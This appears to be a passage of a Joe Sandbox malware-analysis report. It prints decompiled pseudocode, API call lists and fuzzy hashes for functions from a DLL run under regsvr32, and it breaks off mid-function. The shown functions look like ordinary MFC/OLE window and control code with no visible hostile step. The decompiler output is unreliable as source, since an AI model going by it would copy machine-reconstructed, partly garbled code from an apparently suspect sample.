                                                                                                                				signed short* _t242;
                                                                                                                				signed short* _t244;
                                                                                                                				signed short* _t245;
                                                                                                                				signed int _t246;
                                                                                                                				void* _t248;
                                                                                                                
                                                                                                                				_t246 = _t248 - 0x44;
                                                                                                                				_t133 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				 *(_t246 + 0x48) = _t133 ^ _t246;
                                                                                                                				_push(0x50);
                                                                                                                				E1003D1E6(E10053E02, __ebx, __edi, __esi);
                                                                                                                				_t233 =  *((intOrPtr*)(_t246 + 0x60));
                                                                                                                				_t236 =  *(_t246 + 0x68);
                                                                                                                				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
                                                                                                                				 *(_t246 + 8) =  *(_t246 + 0x58);
                                                                                                                				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
                                                                                                                				_t140 = _t233 + 0x12;
                                                                                                                				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
                                                                                                                				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
                                                                                                                					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
                                                                                                                					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
                                                                                                                					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
                                                                                                                					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
                                                                                                                					 *((short*)(_t246 - 0x12)) =  *_t140;
                                                                                                                					_t225 = _t233 + 0x18;
                                                                                                                					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
                                                                                                                					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
                                                                                                                					_t233 = _t246 - 0x20;
                                                                                                                					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
                                                                                                                				}
                                                                                                                				_t226 =  *((short*)(_t233 + 0xa));
                                                                                                                				_t189 =  *((short*)(_t233 + 8));
                                                                                                                				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
                                                                                                                				 *(_t246 - 0x30) = _t189;
                                                                                                                				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
                                                                                                                				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
                                                                                                                				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
                                                                                                                				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
                                                                                                                				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
                                                                                                                					_t194 =  *_t236;
                                                                                                                					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
                                                                                                                					_t236 =  &(_t236[2]);
                                                                                                                					if(_t194 > 0) {
                                                                                                                						__imp__#4(_t236, _t194);
                                                                                                                						_t195 = _t194 + _t194;
                                                                                                                						_t236 = _t236 + _t195;
                                                                                                                						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
                                                                                                                						 *(_t246 + 0x24) = _t145;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
                                                                                                                				E10001050(_t246 + 0x28, _t226, E100173A6());
                                                                                                                				 *((intOrPtr*)(_t246 - 4)) = 0;
                                                                                                                				 *(_t246 + 0xc) = 0;
                                                                                                                				 *(_t246 + 0x10) = 0;
                                                                                                                				 *(_t246 + 0x18) = 0;
                                                                                                                				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
                                                                                                                					_t148 =  *_t236;
                                                                                                                					_t57 = _t148 - 0xc; // -12
                                                                                                                					_t226 = _t57;
                                                                                                                					_t236 =  &(_t236[6]);
                                                                                                                					 *_t246 = _t148;
                                                                                                                					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
                                                                                                                					if(_t226 <= 0) {
                                                                                                                						L16:
                                                                                                                						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
                                                                                                                						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
                                                                                                                						goto L17;
                                                                                                                					} else {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					do {
                                                                                                                						L8:
                                                                                                                						_t177 =  *_t236;
                                                                                                                						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
                                                                                                                						_t242 =  &(_t236[2]);
                                                                                                                						_t193 =  *_t242 & 0x0000ffff;
                                                                                                                						_t236 =  &(_t242[1]);
                                                                                                                						 *(_t246 + 4) = _t177;
                                                                                                                						if(_t177 != 0x80010001) {
                                                                                                                							_t178 = E100160BC(__eflags, 0x1c);
                                                                                                                							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
                                                                                                                							__eflags = _t178;
                                                                                                                							 *((char*)(_t246 - 4)) = 1;
                                                                                                                							if(_t178 == 0) {
                                                                                                                								_t179 = 0;
                                                                                                                								__eflags = 0;
                                                                                                                							} else {
                                                                                                                								_t179 = E1002F888(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
                                                                                                                							}
                                                                                                                							 *((char*)(_t246 - 4)) = 0;
                                                                                                                							 *(_t246 + 0x20) = _t179;
                                                                                                                						} else {
                                                                                                                							_t244 =  &(_t236[2]);
                                                                                                                							 *(_t246 + 0x10) =  *_t236;
                                                                                                                							_t245 =  &(_t244[6]);
                                                                                                                							 *(_t246 + 0x18) =  *_t244;
                                                                                                                							E10002070(_t226, _t233, _t245);
                                                                                                                							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
                                                                                                                							_t221 = 0xffffffef;
                                                                                                                							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
                                                                                                                							_t236 = _t245 + _t184 + 1;
                                                                                                                							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
                                                                                                                						}
                                                                                                                					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
                                                                                                                					_t148 =  *_t246;
                                                                                                                					goto L16;
                                                                                                                				} else {
                                                                                                                					L17:
                                                                                                                					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
                                                                                                                					_t263 =  *_t149 - 0x7b;
                                                                                                                					_push(_t246 + 0x38);
                                                                                                                					_push(_t149);
                                                                                                                					if( *_t149 != 0x7b) {
                                                                                                                						__imp__CLSIDFromProgID();
                                                                                                                					} else {
                                                                                                                						__imp__CLSIDFromString();
                                                                                                                					}
                                                                                                                					_t190 = 0;
                                                                                                                					_push(0);
                                                                                                                					_push( *((intOrPtr*)(_t246 + 0x6c)));
                                                                                                                					_push(_t236);
                                                                                                                					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
                                                                                                                					E10037D5A(0, _t246 - 0x5c, _t233, _t236, _t263);
                                                                                                                					 *((char*)(_t246 - 4)) = 2;
                                                                                                                					 *((intOrPtr*)(_t246 + 0x34)) = 0;
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
                                                                                                                					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
                                                                                                                					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
                                                                                                                						_push(1);
                                                                                                                						if(E1001E059(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E1001E641( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
                                                                                                                							E1002EEA9( *((intOrPtr*)(_t246 + 0x34)), 1);
                                                                                                                							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
                                                                                                                							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
                                                                                                                							_push(_t246 + 0x28);
                                                                                                                							E10001FF0( *((intOrPtr*)(_t246 + 0x34)) + 0xa4);
                                                                                                                							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
                                                                                                                							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
                                                                                                                							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if( *(_t246 + 0x24) != _t190) {
                                                                                                                						__imp__#6( *(_t246 + 0x24));
                                                                                                                					}
                                                                                                                					_t152 =  *((intOrPtr*)(_t246 + 0x34));
                                                                                                                					if(_t152 == _t190) {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
                                                                                                                					} else {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
                                                                                                                						_t190 = 1;
                                                                                                                					}
                                                                                                                					 *((char*)(_t246 - 4)) = 0;
                                                                                                                					E100380BC(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
                                                                                                                					E10001020( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
                                                                                                                					_pop(_t234);
                                                                                                                					_pop(_t241);
                                                                                                                					_pop(_t191);
                                                                                                                					return E1003B437(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
                                                                                                                				}
                                                                                                                			}

































                                                                                                                0x10029a1f
                                                                                                                0x10029a21
                                                                                                                0x10029a24
                                                                                                                0x10029a24
                                                                                                                0x10029a13
                                                                                                                0x10029a27
                                                                                                                0x10029a34
                                                                                                                0x10029a41
                                                                                                                0x10029a44
                                                                                                                0x10029a47
                                                                                                                0x10029a4a
                                                                                                                0x10029a4d
                                                                                                                0x10029a5b
                                                                                                                0x10029a5d
                                                                                                                0x10029a5d
                                                                                                                0x10029a60
                                                                                                                0x10029a65
                                                                                                                0x10029a68
                                                                                                                0x10029a6b
                                                                                                                0x10029af1
                                                                                                                0x10029af1
                                                                                                                0x10029af4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10029a71
                                                                                                                0x10029a71
                                                                                                                0x10029a71
                                                                                                                0x10029a73
                                                                                                                0x10029a77
                                                                                                                0x10029a7a
                                                                                                                0x10029a7e
                                                                                                                0x10029a84
                                                                                                                0x10029a87
                                                                                                                0x10029abe
                                                                                                                0x10029ac4
                                                                                                                0x10029ac7
                                                                                                                0x10029ac9
                                                                                                                0x10029acd
                                                                                                                0x10029adf
                                                                                                                0x10029adf
                                                                                                                0x10029acf
                                                                                                                0x10029ad8
                                                                                                                0x10029ad8
                                                                                                                0x10029ae1
                                                                                                                0x10029ae5
                                                                                                                0x10029a89
                                                                                                                0x10029a8b
                                                                                                                0x10029a8e
                                                                                                                0x10029a93
                                                                                                                0x10029a9a
                                                                                                                0x10029a9d
                                                                                                                0x10029aa5
                                                                                                                0x10029aaa
                                                                                                                0x10029aad
                                                                                                                0x10029ab0
                                                                                                                0x10029ab7
                                                                                                                0x10029ab7
                                                                                                                0x10029ae8
                                                                                                                0x10029aee
                                                                                                                0x00000000
                                                                                                                0x10029afb
                                                                                                                0x10029afb
                                                                                                                0x10029afb
                                                                                                                0x10029afe
                                                                                                                0x10029b05
                                                                                                                0x10029b06
                                                                                                                0x10029b07
                                                                                                                0x10029b11
                                                                                                                0x10029b09
                                                                                                                0x10029b09
                                                                                                                0x10029b09
                                                                                                                0x10029b17
                                                                                                                0x10029b19
                                                                                                                0x10029b1a
                                                                                                                0x10029b20
                                                                                                                0x10029b21
                                                                                                                0x10029b24
                                                                                                                0x10029b38
                                                                                                                0x10029b3c
                                                                                                                0x10029b3f
                                                                                                                0x10029b41
                                                                                                                0x10029b43
                                                                                                                0x10029b46
                                                                                                                0x10029b4f
                                                                                                                0x10029b58
                                                                                                                0x10029b97
                                                                                                                0x10029bab
                                                                                                                0x10029bb7
                                                                                                                0x10029bc9
                                                                                                                0x10029bca
                                                                                                                0x10029bd6
                                                                                                                0x10029be3
                                                                                                                0x10029bef
                                                                                                                0x10029bef
                                                                                                                0x10029b58
                                                                                                                0x10029bf8
                                                                                                                0x10029bfd
                                                                                                                0x10029bfd
                                                                                                                0x10029c03
                                                                                                                0x10029c08
                                                                                                                0x10029c50
                                                                                                                0x10029c0a
                                                                                                                0x10029c12
                                                                                                                0x10029c14
                                                                                                                0x10029c14
                                                                                                                0x10029c18
                                                                                                                0x10029c1c
                                                                                                                0x10029c27
                                                                                                                0x10029c31
                                                                                                                0x10029c39
                                                                                                                0x10029c3a
                                                                                                                0x10029c3b
                                                                                                                0x10029c4a
                                                                                                                0x10029c4a

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10029967
                                                                                                                • MapDialogRect.USER32(?,00000000), ref: 100299F8
                                                                                                                • SysAllocStringLen.OLEAUT32(?,?), ref: 10029A17
                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 10029B09
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • CLSIDFromProgID.OLE32(?,?), ref: 10029B11
                                                                                                                • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10029BAB
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10029BFD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2841959276-0
                                                                                                                • Opcode ID: 2fbf502c7e0bb68af6b3fc4472b3d2ce227007631d1c32c4c8fad4cf1d709ddf
                                                                                                                • Instruction ID: bb67a85301bd41c9e07bc110d845517d056f41f7d71d6ac9e2af78a6986229ac
                                                                                                                • Opcode Fuzzy Hash: 2fbf502c7e0bb68af6b3fc4472b3d2ce227007631d1c32c4c8fad4cf1d709ddf
                                                                                                                • Instruction Fuzzy Hash: E4B10075900249AFDB04DF68D984AEEBBF4FF08384F41812AFC1997251E774E984CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E1003442D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t76;
                                                                                                                				intOrPtr _t78;
                                                                                                                				intOrPtr _t89;
                                                                                                                				intOrPtr* _t93;
                                                                                                                				intOrPtr* _t96;
                                                                                                                				intOrPtr* _t98;
                                                                                                                				void* _t103;
                                                                                                                				intOrPtr _t120;
                                                                                                                				void* _t122;
                                                                                                                				void* _t123;
                                                                                                                				void* _t124;
                                                                                                                
                                                                                                                				_t116 = __edx;
                                                                                                                				_push(0x6c);
                                                                                                                				E1003D1E6(E10054ACB, __ebx, __edi, __esi);
                                                                                                                				_t122 = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx + 0x44)) = 1;
                                                                                                                				 *(_t123 - 0x14) = 0;
                                                                                                                				 *(_t123 - 0x10) = 0;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
                                                                                                                					L18:
                                                                                                                					 *(_t122 + 0x44) =  *(_t122 + 0x44) & 0x00000000;
                                                                                                                					return E1003D2BE(0);
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					L1:
                                                                                                                					_t108 =  *(_t123 - 0x10) * 0x28;
                                                                                                                					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x14)) + 0x24 +  *(_t123 - 0x10) * 0x28));
                                                                                                                					if(_t76 == 0) {
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					_t78 =  *((intOrPtr*)(_t76 + 4));
                                                                                                                					 *((intOrPtr*)(_t123 - 0x20)) = _t78;
                                                                                                                					if(_t78 == 0) {
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					 *(_t123 - 0x18) =  *(_t123 - 0x14) << 4;
                                                                                                                					do {
                                                                                                                						_t120 =  *((intOrPtr*)(E100182A6(_t123 - 0x20)));
                                                                                                                						 *((intOrPtr*)(_t123 - 0x24)) = 0xfffffffd;
                                                                                                                						E1003BB70(_t120, _t123 - 0x78, 0, 0x20);
                                                                                                                						_t124 = _t124 + 0xc;
                                                                                                                						E1002A12B(_t123 - 0x48);
                                                                                                                						 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                                                                                                                						_t130 =  *((intOrPtr*)(_t122 + 0x48));
                                                                                                                						if( *((intOrPtr*)(_t122 + 0x48)) == 0) {
                                                                                                                							_t89 =  *((intOrPtr*)(_t122 + 0x40)) +  *(_t123 - 0x18);
                                                                                                                							__eflags = _t89;
                                                                                                                						} else {
                                                                                                                							_t103 = E10033F16(_t108, _t122, _t116, _t120, _t122, _t130);
                                                                                                                							 *(_t123 - 4) = 1;
                                                                                                                							E1002A10B(_t103, _t123 - 0x48, _t103);
                                                                                                                							 *(_t123 - 4) = 0;
                                                                                                                							__imp__#9(_t123 - 0x58, _t123 - 0x58,  *(_t123 - 0x10) + 1);
                                                                                                                							_t89 = _t123 - 0x48;
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)(_t123 - 0x38)) = _t89;
                                                                                                                						 *((intOrPtr*)(_t123 - 0x34)) = _t123 - 0x24;
                                                                                                                						 *((intOrPtr*)(_t123 - 0x30)) = 1;
                                                                                                                						 *((intOrPtr*)(_t123 - 0x2c)) = 1;
                                                                                                                						 *(_t120 + 0x88) = 1;
                                                                                                                						_t93 =  *((intOrPtr*)(_t120 + 0x50));
                                                                                                                						if(_t93 != 0) {
                                                                                                                							_t116 = _t123 - 0x1c;
                                                                                                                							_push(_t123 - 0x1c);
                                                                                                                							_push(0x1005f974);
                                                                                                                							_push(_t93);
                                                                                                                							if( *((intOrPtr*)( *_t93))() >= 0) {
                                                                                                                								_t96 =  *((intOrPtr*)(_t123 - 0x1c));
                                                                                                                								_t116 = _t123 - 0x38;
                                                                                                                								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t120 + 0x9c)), 0x1005fa04, 0, 4, _t123 - 0x38, 0, _t123 - 0x78, _t123 - 0x28);
                                                                                                                								_t98 =  *((intOrPtr*)(_t123 - 0x1c));
                                                                                                                								 *((intOrPtr*)( *_t98 + 8))(_t98);
                                                                                                                								 *(_t120 + 0x88) =  *(_t120 + 0x88) & 0x00000000;
                                                                                                                								if( *((intOrPtr*)(_t123 - 0x74)) != 0) {
                                                                                                                									__imp__#6( *((intOrPtr*)(_t123 - 0x74)));
                                                                                                                								}
                                                                                                                								if( *((intOrPtr*)(_t123 - 0x70)) != 0) {
                                                                                                                									__imp__#6( *((intOrPtr*)(_t123 - 0x70)));
                                                                                                                								}
                                                                                                                								if( *((intOrPtr*)(_t123 - 0x6c)) != 0) {
                                                                                                                									__imp__#6( *((intOrPtr*)(_t123 - 0x6c)));
                                                                                                                								}
                                                                                                                								 *(_t123 - 0x14) =  *(_t123 - 0x14) + 1;
                                                                                                                								 *(_t123 - 0x18) =  *(_t123 - 0x18) + 0x10;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
                                                                                                                						__imp__#9(_t123 - 0x48);
                                                                                                                					} while ( *((intOrPtr*)(_t123 - 0x20)) != 0);
                                                                                                                					L17:
                                                                                                                					 *(_t123 - 0x10) =  *(_t123 - 0x10) + 1;
                                                                                                                				} while ( *(_t123 - 0x10) <  *((intOrPtr*)(_t122 + 0x10)));
                                                                                                                				goto L18;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10034434
                                                                                                                • _memset.LIBCMT ref: 100344A0
                                                                                                                  • Part of subcall function 1002A12B: _memset.LIBCMT ref: 1002A133
                                                                                                                • VariantClear.OLEAUT32(?), ref: 100344E0
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10034561
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10034570
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 1003457F
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 10034594
                                                                                                                  • Part of subcall function 10033F16: __EH_prolog3.LIBCMT ref: 10033F32
                                                                                                                  • Part of subcall function 10033F16: VariantClear.OLEAUT32(?), ref: 10033F97
                                                                                                                  • Part of subcall function 1002A10B: VariantCopy.OLEAUT32(?,?), ref: 1002A119
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2905758408-0
                                                                                                                • Opcode ID: 8a3cee275fbd3255d2378654e06d20561fa7fabd1a35d831ceed9d24a6cd2184
                                                                                                                • Instruction ID: cfce0400574360d5a042119d4ab7efdbb1c511c435b70370873c8368bd04af60
                                                                                                                • Opcode Fuzzy Hash: 8a3cee275fbd3255d2378654e06d20561fa7fabd1a35d831ceed9d24a6cd2184
                                                                                                                • Instruction Fuzzy Hash: 4C511374E006099FDB51CFA4C884BEEBBF8FF08305F114529E515EB292DB74AA44CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 63%
                                                                                                                			E1002728F(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v17;
                                                                                                                				char _v18;
                                                                                                                				signed int _v19;
                                                                                                                				char _v28;
                                                                                                                				long _v32;
                                                                                                                				signed int _v36;
                                                                                                                				char _v52;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t43;
                                                                                                                				signed int _t50;
                                                                                                                				signed char _t57;
                                                                                                                				void* _t68;
                                                                                                                				void* _t86;
                                                                                                                				intOrPtr* _t87;
                                                                                                                				intOrPtr* _t88;
                                                                                                                				signed int _t89;
                                                                                                                
                                                                                                                				_t86 = __edx;
                                                                                                                				_t43 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t43 ^ _t89;
                                                                                                                				_t87 = _a8;
                                                                                                                				_t88 = __ecx;
                                                                                                                				_push( &_v28);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0x417);
                                                                                                                				 *((intOrPtr*)( *__ecx + 0x110))();
                                                                                                                				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
                                                                                                                				_v18 = 0;
                                                                                                                				_v17 = 0;
                                                                                                                				 *((char*)(_t87 + 0xa)) = 0;
                                                                                                                				 *((char*)(_t87 + 0xb)) = 0;
                                                                                                                				if(E1003D636(_t87,  &_v28, 0x14) != 0) {
                                                                                                                					_t50 = E1001D23C(_t88);
                                                                                                                					_t69 = _t50;
                                                                                                                					_v36 = _t50;
                                                                                                                					E1001D270(_t88, 0x10000000, 0, 0);
                                                                                                                					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, _t68);
                                                                                                                					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
                                                                                                                						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
                                                                                                                						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
                                                                                                                						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
                                                                                                                						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
                                                                                                                						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
                                                                                                                						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
                                                                                                                						_t69 = _v36;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *_t88 + 0x110))(_a4, _t87);
                                                                                                                					E1001D270(_t88, 0, _t69 & 0x10000000, 0);
                                                                                                                					_t57 =  *((intOrPtr*)(_t87 + 9));
                                                                                                                					_t68 = 0x415;
                                                                                                                					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
                                                                                                                						_push(1);
                                                                                                                						_push(0);
                                                                                                                						goto L9;
                                                                                                                					} else {
                                                                                                                						_push( &_v52);
                                                                                                                						_push(_a4);
                                                                                                                						_push(0x41d);
                                                                                                                						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
                                                                                                                							_push(1);
                                                                                                                							_push( &_v52);
                                                                                                                							L9:
                                                                                                                							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E1003B437(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
                                                                                                                			}






















                                                                                                                0x100273cd
                                                                                                                0x100273d2
                                                                                                                0x100273d9
                                                                                                                0x100273dc
                                                                                                                0x100273dc
                                                                                                                0x100273cb
                                                                                                                0x100273a6
                                                                                                                0x100273ef

                                                                                                                APIs
                                                                                                                • _memcmp.LIBCMT ref: 100272D7
                                                                                                                  • Part of subcall function 1001D23C: GetWindowLongA.USER32(?,000000F0), ref: 1001D247
                                                                                                                • SendMessageA.USER32 ref: 10027330
                                                                                                                • SendMessageA.USER32 ref: 1002733E
                                                                                                                • SendMessageA.USER32 ref: 1002734F
                                                                                                                • SendMessageA.USER32 ref: 1002735E
                                                                                                                • SendMessageA.USER32 ref: 10027369
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 100273DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$InvalidateLongRectWindow_memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 235743446-0
                                                                                                                • Opcode ID: f01f067c09bd80f7d76f52cb94a2eac821769c6745212cb122ea07a4b356d0c4
                                                                                                                • Instruction ID: 045eb8fc5185feba0cb7262de9c9630ccf681ca53ba2fbb2d07fe586672410d7
                                                                                                                • Opcode Fuzzy Hash: f01f067c09bd80f7d76f52cb94a2eac821769c6745212cb122ea07a4b356d0c4
                                                                                                                • Instruction Fuzzy Hash: DF418F34640718BFEB21DB64CC56FAEBBB5FF08750F504418FA956A2D1C7B0A940DB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E100311C4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _t59;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t69;
                                                                                                                				signed int _t70;
                                                                                                                				signed int _t71;
                                                                                                                				void* _t81;
                                                                                                                				intOrPtr* _t82;
                                                                                                                				void* _t97;
                                                                                                                				signed int _t98;
                                                                                                                				void* _t101;
                                                                                                                				void* _t102;
                                                                                                                				void* _t103;
                                                                                                                
                                                                                                                				_t103 = __eflags;
                                                                                                                				_push(0x60);
                                                                                                                				E1003D1E6(E1005468C, __ebx, __edi, __esi);
                                                                                                                				_t97 =  *(_t101 + 8) + 0xffffff28;
